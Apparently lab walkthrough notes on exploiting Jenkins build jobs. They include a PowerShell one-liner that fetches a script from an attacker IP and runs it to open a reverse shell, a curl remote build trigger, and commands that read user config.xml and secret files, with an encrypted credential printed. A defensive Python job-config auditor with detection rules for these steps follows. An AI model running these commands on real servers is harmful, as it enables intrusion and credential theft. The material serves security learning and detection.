Jenkins

If admin

Go to Create task, make a new task, and add a build step as a Windows batch command.

Test using whoami

Or, for a reverse shell:

powershell.exe iex (iwr http://172.16.100.X/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.X -Port 443

If not an admin

The user seems to have overall create, read and delete permissions. As we can't trigger builds from the UI, we can try to do it from the Jenkins API. Let's click on Configure > Build Triggers > Trigger builds remotely and enter an authentication token of your choice, for example test. Now click on Build > Add build step > Execute a Windows batch command and enter whoami. Then, at the top right, click on the user icon and navigate to Configure.

Click on Add new Token and enter the token that we created earlier. Click on generate and copy the generated token. Using this token we can trigger the earlier configured job.

curl http://test:@10.129.95.232:8080/job//build?token=test

We can attempt to read the credentials.xml file, in case any credentials have been added to Jenkins. It's plausible that the master server will hold SSH keys, AWS secrets, and user credentials among other sensitive files. We can see the Jenkins path from the earlier build result. Let's see if there are any secrets stored by the users. To do this, modify the earlier build command as follows and trigger the build using cURL.

cmd.exe /c "dir c:\Users\oliver\Appdata\local\jenkins\.jenkins\users"

We see our user's folder and the admin user's folder. Let's check the contents of config.xml inside the admin folder. This reveals that the credentials of user oliver are stored on Jenkins. Save this file as credentials.xml on your machine. Now let's retrieve master.key and hudson.util.Secret from the secrets folder.

cmd.exe /c "type C:\Users\oliver\Appdata\local\jenkins\.jenkins\users\admin_17207690984073220035\config.xml"

oliver {AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=} false
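
Defender-side check for the job changes described above (a remote trigger token, plus a batch build step that reads Jenkins secret files or pulls a script over HTTP), as an added example that is not part of the original notes. The function name audit_job, the RULES list and the sample config.xml are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample job config.xml (not from the page's target).
SAMPLE_JOB = r"""<?xml version='1.1' encoding='UTF-8'?>
<project>
  <authToken>test</authToken>
  <builders>
    <hudson.tasks.BatchFile>
      <command>cmd.exe /c "type C:\Users\oliver\Appdata\local\jenkins\.jenkins\secrets\master.key"</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>"""

# Hypothetical rule set: command patterns worth a reviewer's attention.
RULES = [
    ("reads Jenkins secret material", re.compile(
        r"master\.key|hudson\.util\.Secret|credentials\.xml"
        r"|users[\\/][^\\/\s\"]+[\\/]config\.xml", re.I)),
    ("downloads and runs a remote script", re.compile(
        r"\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest)\b", re.I)),
]

def audit_job(xml_text):
    """Return findings for one job config.xml given as a string."""
    # Jenkins writes an XML 1.1 declaration, which Python's expat parser
    # rejects, so drop the declaration before parsing.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)
    findings = []
    # <authToken> is present when "Trigger builds remotely" is enabled.
    if (root.findtext("authToken") or "").strip():
        findings.append("remote build trigger enabled (authToken set)")
    # Batch and shell build steps keep their script in a <command> child.
    for step in root.findall("./builders/*"):
        command = step.findtext("command") or ""
        for label, pattern in RULES:
            if pattern.search(command):
                findings.append(f"{step.tag}: {label}")
    return findings

if __name__ == "__main__":
    for finding in audit_job(SAMPLE_JOB):
        print(finding)
```

Run it over every jobs/<name>/config.xml under JENKINS_HOME and review any job that reports both a trigger token and a flagged build step.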
